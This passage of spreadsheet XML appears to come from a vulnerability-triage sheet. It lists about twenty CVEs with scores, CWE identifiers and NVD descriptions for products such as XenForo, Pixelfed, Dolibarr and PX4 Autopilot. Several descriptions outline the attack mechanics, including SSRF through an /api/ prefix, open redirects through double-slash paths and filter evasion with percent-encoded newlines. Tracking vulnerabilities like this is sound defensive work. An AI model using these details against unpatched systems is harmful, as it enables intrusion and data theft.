t="inlineStr"><is><t>NVD</t></is></c><c r="O2164" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2164" s="5" t="inlineStr" /><c r="Q2164" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="R2164" s="5" t="inlineStr"><is><t>Sim before 0.8.14 classifies tool requests as internal based on URL prefix matching without scheme normalization, skipping SSRF validation and minting internal authentication tokens. Authenticated workflow authors can bypass external URL validation by supplying paths starting with /api/ in HTTP blocks to reach internal-only endpoints like POST /api/function/execute.</t></is></c><c r="S2164" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86115</t></is></c></row><row r="2165"><c r="A2165" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2165" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2165" s="5" t="inlineStr"><is><t>CVE-2026-86120</t></is></c><c r="D2165" s="5" t="n"><v>5.3</v></c><c r="E2165" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2165" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2165" s="5" t="inlineStr" /><c r="H2165" s="5" t="n"><v>0.002</v></c><c r="I2165" s="5" t="inlineStr" /><c r="J2165" s="5" t="inlineStr" /><c r="K2165" s="5" t="inlineStr" /><c r="L2165" s="5" t="inlineStr" /><c r="M2165" s="5" t="inlineStr" /><c r="N2165" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2165" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2165" s="5" t="inlineStr" /><c r="Q2165" s="5" t="inlineStr"><is><t>CWE-636</t></is></c><c r="R2165" s="5" t="inlineStr"><is><t>APITable through 1.13.0-beta.1 contains an incorrect authorization vulnerability in NodePermissionGuard that fails to enforce node-level access control when permission lookups throw exceptions. Attackers with valid Fusion API tokens can write attachments to private datasheets they have been explicitly denied access to by exploiting the unhandled exception in the permission guard.</t></is></c><c r="S2165" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86120</t></is></c></row><row r="2166"><c r="A2166" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2166" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2166" s="5" t="inlineStr"><is><t>CVE-2026-86178</t></is></c><c r="D2166" s="5" t="n"><v>5.3</v></c><c r="E2166" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2166" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2166" s="5" t="inlineStr" /><c r="H2166" s="5" t="n"><v>0.002</v></c><c r="I2166" s="5" t="inlineStr" /><c r="J2166" s="5" t="inlineStr" /><c r="K2166" s="5" t="inlineStr" /><c r="L2166" s="5" t="inlineStr" /><c r="M2166" s="5" t="inlineStr" /><c r="N2166" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2166" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2166" s="5" t="inlineStr" /><c r="Q2166" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2166" s="5" t="inlineStr"><is><t>Pixelfed through 0.12.9 fails to validate follower status in StoryComposeController react and comment endpoints, allowing authenticated users to access follower-only stories. Attackers can enumerate sequential story IDs and submit reactions or comments to retrieve story media URLs and author information without following the account.</t></is></c><c r="S2166" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86178</t></is></c></row><row r="2167"><c r="A2167" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2167" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2167" s="5" t="inlineStr"><is><t>CVE-2026-86191</t></is></c><c r="D2167" s="5" t="n"><v>5.3</v></c><c r="E2167" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2167" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2167" s="5" t="inlineStr" /><c r="H2167" s="5" t="n"><v>0.002</v></c><c r="I2167" s="5" t="inlineStr" /><c r="J2167" s="5" t="inlineStr" /><c r="K2167" s="5" t="inlineStr" /><c r="L2167" s="5" t="inlineStr" /><c r="M2167" s="5" t="inlineStr" /><c r="N2167" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2167" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2167" s="5" t="inlineStr" /><c r="Q2167" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2167" s="5" t="inlineStr"><is><t>SiYuan versions before v3.8.2 contain an information disclosure vulnerability in the getAttributeViewKeysByID endpoint that allows publish readers to enumerate private attribute view key definitions without verifying parent database visibility. Attackers can access the endpoint to retrieve complete key schemas including sensitive field names and relation definitions from hidden databases.</t></is></c><c r="S2167" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86191</t></is></c></row><row r="2168"><c r="A2168" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2168" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2168" s="5" t="inlineStr"><is><t>CVE-2026-86205</t></is></c><c r="D2168" s="5" t="n"><v>5.3</v></c><c r="E2168" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2168" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2168" s="5" t="inlineStr" /><c r="H2168" s="5" t="n"><v>0.002</v></c><c r="I2168" s="5" t="inlineStr" /><c r="J2168" s="5" t="inlineStr" /><c r="K2168" s="5" t="inlineStr" /><c r="L2168" s="5" t="inlineStr" /><c r="M2168" s="5" t="inlineStr" /><c r="N2168" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2168" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2168" s="5" t="inlineStr" /><c r="Q2168" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="R2168" s="5" t="inlineStr"><is><t>h3 versions before 2.0.1-rc.18 contain an open redirect vulnerability in the redirectBack() utility that fails to sanitize protocol-relative paths in the Referer header pathname. Attackers can craft a same-origin URL with a double-slash path segment that passes origin validation but produces a Location header interpreted by browsers as a protocol-relative redirect to an external domain.</t></is></c><c r="S2168" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86205</t></is></c></row><row r="2169"><c r="A2169" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2169" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2169" s="5" t="inlineStr"><is><t>CVE-2026-86714</t></is></c><c r="D2169" s="5" t="n"><v>5.3</v></c><c r="E2169" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2169" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2169" s="5" t="inlineStr" /><c r="H2169" s="5" t="n"><v>0.002</v></c><c r="I2169" s="5" t="inlineStr" /><c r="J2169" s="5" t="inlineStr" /><c r="K2169" s="5" t="inlineStr" /><c r="L2169" s="5" t="inlineStr" /><c r="M2169" s="5" t="inlineStr" /><c r="N2169" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2169" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2169" s="5" t="inlineStr" /><c r="Q2169" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2169" s="5" t="inlineStr"><is><t>PX4 Autopilot through 1.17.0 contains a stack buffer over-read vulnerability in the netman system command that fails to validate interface name length. Attackers can supply interface names of 74 bytes or more via the -i option to read beyond buffer boundaries, leaking stack memory to console output or writing it into persistent network configuration files.</t></is></c><c r="S2169" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86714</t></is></c></row><row r="2170"><c r="A2170" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2170" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2170" s="5" t="inlineStr"><is><t>CVE-2026-86719</t></is></c><c r="D2170" s="5" t="n"><v>5.3</v></c><c r="E2170" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2170" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2170" s="5" t="inlineStr" /><c r="H2170" s="5" t="n"><v>0.001</v></c><c r="I2170" s="5" t="inlineStr" /><c r="J2170" s="5" t="inlineStr" /><c r="K2170" s="5" t="inlineStr" /><c r="L2170" s="5" t="inlineStr" /><c r="M2170" s="5" t="inlineStr" /><c r="N2170" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2170" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2170" s="5" t="inlineStr" /><c r="Q2170" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2170" s="5" t="inlineStr"><is><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is></c><c r="S2170" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86719</t></is></c></row><row r="2171"><c r="A2171" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2171" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2171" s="5" t="inlineStr"><is><t>CVE-2026-86737</t></is></c><c r="D2171" s="5" t="n"><v>5.3</v></c><c r="E2171" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2171" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2171" s="5" t="inlineStr" /><c r="H2171" s="5" t="n"><v>0.002</v></c><c r="I2171" s="5" t="inlineStr" /><c r="J2171" s="5" t="inlineStr" /><c r="K2171" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L2171" s="5" t="inlineStr" /><c r="M2171" s="5" t="inlineStr" /><c r="N2171" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2171" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2171" s="5" t="inlineStr" /><c r="Q2171" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R2171" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 fail to enforce asset view authorization in the GET /hardware/{asset}/barcode endpoint. Authenticated attackers can iterate asset IDs to retrieve barcodes and enumerate asset tags across tenants, including soft-deleted and cross-company assets.</t></is></c><c r="S2171" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86737</t></is></c></row><row r="2172"><c r="A2172" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2172" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2172" s="5" t="inlineStr"><is><t>CVE-2026-85454</t></is></c><c r="D2172" s="5" t="n"><v>5.2</v></c><c r="E2172" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2172" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2172" s="5" t="inlineStr" /><c r="H2172" s="5" t="n"><v>0.002</v></c><c r="I2172" s="5" t="inlineStr" /><c r="J2172" s="5" t="inlineStr" /><c r="K2172" s="5" t="inlineStr" /><c r="L2172" s="5" t="inlineStr" /><c r="M2172" s="5" t="inlineStr" /><c r="N2172" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2172" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2172" s="5" t="inlineStr" /><c r="Q2172" s="5" t="inlineStr"><is><t>CWE-193</t></is></c><c r="R2172" s="5" t="inlineStr"><is><t>MOOS core-moos through 10.4.0 contains a buffer overflow vulnerability in CMOOSSerialPort::GetTelegram() that writes a NUL terminator one byte past the serial telegram stack buffer. Attackers controlling the serial line can send a full-length telegram to trigger the off-by-one write, corrupting the stack and potentially enabling code execution.</t></is></c><c r="S2172" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85454</t></is></c></row><row r="2173"><c r="A2173" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2173" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2173" s="5" t="inlineStr"><is><t>CVE-2026-11891</t></is></c><c r="D2173" s="5" t="n"><v>5.1</v></c><c r="E2173" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2173" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2173" s="5" t="inlineStr" /><c r="H2173" s="5" t="n"><v>0.001</v></c><c r="I2173" s="5" t="inlineStr" /><c r="J2173" s="5" t="inlineStr" /><c r="K2173" s="5" t="inlineStr" /><c r="L2173" s="5" t="inlineStr" /><c r="M2173" s="5" t="inlineStr" /><c r="N2173" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2173" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2173" s="5" t="inlineStr" /><c r="Q2173" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R2173" s="5" t="inlineStr"><is><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is></c><c r="S2173" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11891</t></is></c></row><row r="2174"><c r="A2174" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2174" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2174" s="5" t="inlineStr"><is><t>CVE-2026-12387</t></is></c><c r="D2174" s="5" t="n"><v>5.1</v></c><c r="E2174" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2174" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2174" s="5" t="inlineStr" /><c r="H2174" s="5" t="n"><v>0.001</v></c><c r="I2174" s="5" t="inlineStr" /><c r="J2174" s="5" t="inlineStr" /><c r="K2174" s="5" t="inlineStr" /><c r="L2174" s="5" t="inlineStr" /><c r="M2174" s="5" t="inlineStr" /><c r="N2174" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2174" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2174" s="5" t="inlineStr" /><c r="Q2174" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R2174"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S2174" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12387</t></is></c></row><row r="2175"><c r="A2175" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2175" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2175" s="5" t="inlineStr"><is><t>CVE-2026-33387</t></is></c><c r="D2175" s="5" t="n"><v>5.1</v></c><c r="E2175" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2175" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G2175" s="5" t="inlineStr" /><c r="H2175" s="5" t="n"><v>0.002</v></c><c r="I2175" s="5" t="inlineStr" /><c r="J2175" s="5" t="inlineStr" /><c r="K2175" s="5" t="inlineStr" /><c r="L2175" s="5" t="inlineStr" /><c r="M2175" s="5" t="inlineStr" /><c r="N2175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2175" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2175" s="5" t="inlineStr" /><c r="Q2175" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="R2175" s="5" t="inlineStr"><is><t>A template injection vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated user with the required privileges can define a dashboard containing a malicious payload, or a victim can be socially engineered into importing a malicious dashboard. When the victim views or imports the dashboard, the payload executes in their browser context, allowing the attacker to modify application data or disrupt application availability.</t></is></c><c r="S2175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33387</t></is></c></row><row r="2176"><c r="A2176" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2176" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2176" s="5" t="inlineStr"><is><t>CVE-2026-33920</t></is></c><c r="D2176" s="5" t="n"><v>5.1</v></c><c r="E2176" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2176" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G2176" s="5" t="inlineStr" /><c r="H2176" s="5" t="n"><v>0.001</v></c><c r="I2176" s="5" t="inlineStr" /><c r="J2176" s="5" t="inlineStr" /><c r="K2176" s="5" t="inlineStr" /><c r="L2176" s="5" t="inlineStr" /><c r="M2176" s="5" t="inlineStr" /><c r="N2176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2176" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2176" s="5" t="inlineStr" /><c r="Q2176" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="R2176" s="5" t="inlineStr"><is><t>A cross-site request forgery vulnerability was discovered in the login functionality (both standard and SAML) due to missing validation of the anti-CSRF token. An attacker with a valid account can trick a victim into unknowingly authenticating with the attacker's credentials. Any operation performed by the victim in this state is attributed to the attacker's account, compromising the integrity of the audit trail.</t></is></c><c r="S2176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33920</t></is></c></row><row r="2177"><c r="A2177" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2177" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2177" s="5" t="inlineStr"><is><t>CVE-2026-71503</t></is></c><c r="D2177" s="5" t="n"><v>5.1</v></c><c r="E2177" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2177" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2177" s="5" t="inlineStr" /><c r="H2177" s="5" t="n"><v>0.002</v></c><c r="I2177" s="5" t="inlineStr" /><c r="J2177" s="5" t="inlineStr" /><c r="K2177" s="5" t="inlineStr" /><c r="L2177" s="5" t="inlineStr" /><c r="M2177" s="5" t="inlineStr" /><c r="N2177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2177" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P2177" s="5" t="inlineStr" /><c r="Q2177" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2177" s="5" t="inlineStr"><is><t>Dolibarr before 24.0.0 contains a reflected cross-site scripting vulnerability in the extra fields administration template where the type request parameter is echoed without JavaScript-context encoding into an inline script block and no Content-Security-Policy header is emitted. An unauthenticated attacker can cause an authenticated administrator to open a crafted URL to execute arbitrary JavaScript in that session and create a persistent administrator account.</t></is></c><c r="S2177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71503</t></is></c></row><row r="2178"><c r="A2178" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2178" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2178" s="5" t="inlineStr"><is><t>CVE-2026-73317</t></is></c><c r="D2178" s="5" t="n"><v>5.1</v></c><c r="E2178" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2178" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2178" s="5" t="inlineStr" /><c r="H2178" s="5" t="n"><v>0.003</v></c><c r="I2178" s="5" t="inlineStr" /><c r="J2178" s="5" t="inlineStr" /><c r="K2178" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L2178" s="5" t="inlineStr" /><c r="M2178" s="5" t="inlineStr" /><c r="N2178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2178" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2178" s="5" t="inlineStr" /><c r="Q2178" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2178" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a missing authorization vulnerability in the ACP cache-rebuild dispatcher that allows limited administrators with only the rebuildCache permission to perform unauthorized approval queue actions by supplying an arbitrary job class and actor user ID in the POST body. Attackers can invoke the approval queue job under any user identity to approve queued user registrations without holding the required approval-queue or moderator permissions, causing the moderation log to attribute actions to an impersonated account.</t></is></c><c r="S2178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t></is></c></row><row r="2179"><c r="A2179" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2179" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2179" s="5" t="inlineStr"><is><t>CVE-2026-73318</t></is></c><c r="D2179" s="5" t="n"><v>5.1</v></c><c r="E2179" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2179" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2179" s="5" t="inlineStr" /><c r="H2179" s="5" t="n"><v>0.003</v></c><c r="I2179" s="5" t="inlineStr" /><c r="J2179" s="5" t="inlineStr" /><c r="K2179" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L2179" s="5" t="inlineStr" /><c r="M2179" s="5" t="inlineStr" /><c r="N2179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2179" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2179" s="5" t="inlineStr" /><c r="Q2179" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2179" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a missing authorization vulnerability in the force-agreement controller that allows any ACP administrator to access and submit force-agreement forms regardless of their assigned permissions. Attackers can bypass the option permission declared in the navigation configuration to update the global policy last-updated timestamp, forcing all users to re-agree to the privacy policy or terms of service.</t></is></c><c r="S2179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73318</t></is></c></row><row r="2180"><c r="A2180" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2180" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2180" s="5" t="inlineStr"><is><t>CVE-2026-73319</t></is></c><c r="D2180" s="5" t="n"><v>5.1</v></c><c r="E2180" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2180" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2180" s="5" t="inlineStr" /><c r="H2180" s="5" t="n"><v>0.003</v></c><c r="I2180" s="5" t="inlineStr" /><c r="J2180" s="5" t="inlineStr" /><c r="K2180" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L2180" s="5" t="inlineStr" /><c r="M2180" s="5" t="inlineStr" /><c r="N2180" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2180" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2180" s="5" t="inlineStr" /><c r="Q2180" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2180" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a cross-site scripting vulnerability in the dynamic redirect handler that allows unauthenticated attackers to execute arbitrary JavaScript in the board origin by crafting a malicious javascript: URI that bypasses host validation. Attackers can embed the board hostname in the URI authority component and use percent-encoded newlines to evade server-side filters, causing authenticated users who perform a Follow action to execute attacker-supplied JavaScript in their browser.</t></is></c><c r="S2180" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t></is></c></row><row r="2181"><c r="A2181" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2181" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2181" s="5" t="inlineStr"><is><t>CVE-2026-73320</t></is></c><c r="D2181" s="5" t="n"><v>5.1</v></c><c r="E2181" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2181" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2181" s="5" t="inlineStr" /><c r="H2181" s="5" t="n"><v>0.003</v></c><c r="I2181" s="5" t="inlineStr" /><c r="J2181" s="5" t="inlineStr" /><c r="K2181" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L2181" s="5" t="inlineStr" /><c r="M2181" s="5" t="inlineStr" /><c r="N2181" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2181" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2181" s="5" t="inlineStr" /><c r="Q2181" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R2181" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an unauthenticated information disclosure vulnerability that allows unauthenticated attackers to retrieve private unfurl records by supplying predictable auto-increment primary key IDs to the unfurl endpoint. Attackers can enumerate or predict result IDs and query the endpoint without any session, user, or visibility checks to obtain rendered preview HTML, original URLs, and query strings from private conversations and other restricted content.</t></is></c><c r="S2181" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t></is></c></row><row r="2182"><c r="A2182" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2182" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2182" s="5" t="inlineStr"><is><t>CVE-2026-73524</t></is></c><c r="D2182" s="5" t="n"><v>5.1</v></c><c r="E2182" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2182" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2182" s="5" t="inlineStr" /><c r="H2182" s="5" t="n"><v>0.003</v></c><c r="I2182" s="5" t="inlineStr" /><c r="J2182" s="5" t="inlineStr" /><c r="K2182" s="5" t="inlineStr" /><c r="L2182" s="5" t="inlineStr" /><c r="M2182" s="5" t="inlineStr" /><c r="N2182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2182" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2182" s="5" t="inlineStr" /><c r="Q2182" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2182" s="5" t="inlineStr"><is><t>Cypht before 2.12.2 contains a cross-site scripting vulnerability in the contacts module that allows remote attackers to execute arbitrary script content by embedding malicious payloads within angle brackets in the FROM email header. The sanitization logic removes only the first occurrence of each angle bracket character, leaving additional angle brackets intact, which attackers exploit by delivering a crafted email whose FROM header executes script in the victim's browser when the user opens the message and accesses the Add Local Contacts function.</t></is></c><c r="S2182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73524</t></is></c></row><row r="2183"><c r="A2183" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2183" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2183" s="5" t="inlineStr"><is><t>CVE-2026-82024</t></is></c><c r="D2183" s="5" t="n"><v>5.1</v></c><c r="E2183" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2183" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2183" s="5" t="inlineStr" /><c r="H2183" s="5" t="n"><v>0.001</v></c><c r="I2183" s="5" t="inlineStr" /><c r="J2183" s="5" t="inlineStr" /><c r="K2183" s="5" t="inlineStr" /><c r="L2183" s="5" t="inlineStr" /><c r="M2183" s="5" t="inlineStr" /><c r="N2183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2183" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P2183" s="5" t="inlineStr" /><c r="Q2183" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2183" s="5" t="inlineStr"><is><t>LearnPress WordPress Plugin before 4.4.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers with the Instructor role to inject persistent malicious payloads by submitting unsanitized input into quiz question answer title fields. Attackers can store arbitrary JavaScript through the answer title parameter, which is rendered through an unescaped HTML sink to execute in the browsers of any user who views the affected quiz question, including students, other instructors, and administrators.</t></is></c><c r="S2183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82024</t></is></c></row><row r="2184"><c r="A2184" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2184" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2184" s="5" t="inlineStr"><is><t>CVE-2026-82881</t></is></c><c r="D2184" s="5" t="n"><v>5.1</v></c><c r="E2184" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2184" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2184" s="5" t="inlineStr" /><c r="H2184" s="5" t="n"><v>0.002</v></c><c r="I2184" s="5" t="inlineStr" /><c r="J2184" s="5" t="inlineStr" /><c r="K2184" s="5" t="inlineStr" /><c r="L2184" s="5" t="inlineStr" /><c r="M2184" s="5" t="inlineStr" /><c r="N2184" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2184" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2184" s="5" t="inlineStr" /><c r="Q2184" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2184" s="5" t="inlineStr"><is><t>Aix-DB through 1.2.4 renders markdown with raw HTML enabled into v-html bindings without sanitization, allowing stored cross-site scripting attacks. Attackers can inject malicious HTML and JavaScript through markdown content in chat responses, skill descriptions, or knowledge messages that execute in users' browsers when viewed.</t></is></c><c r="S2184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82881</t></is></c></row><row r="2185"><c r="A2185" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2185" s="5" t="inlineStr"><is><t>CVE-2026-84386</t></is></c><c r="D2185" s="5" t="n"><v>5.1</v></c><c r="E2185" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2185" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G2185" s="5" t="inlineStr" /><c r="H2185" s="5" t="n"><v>0.001</v></c><c 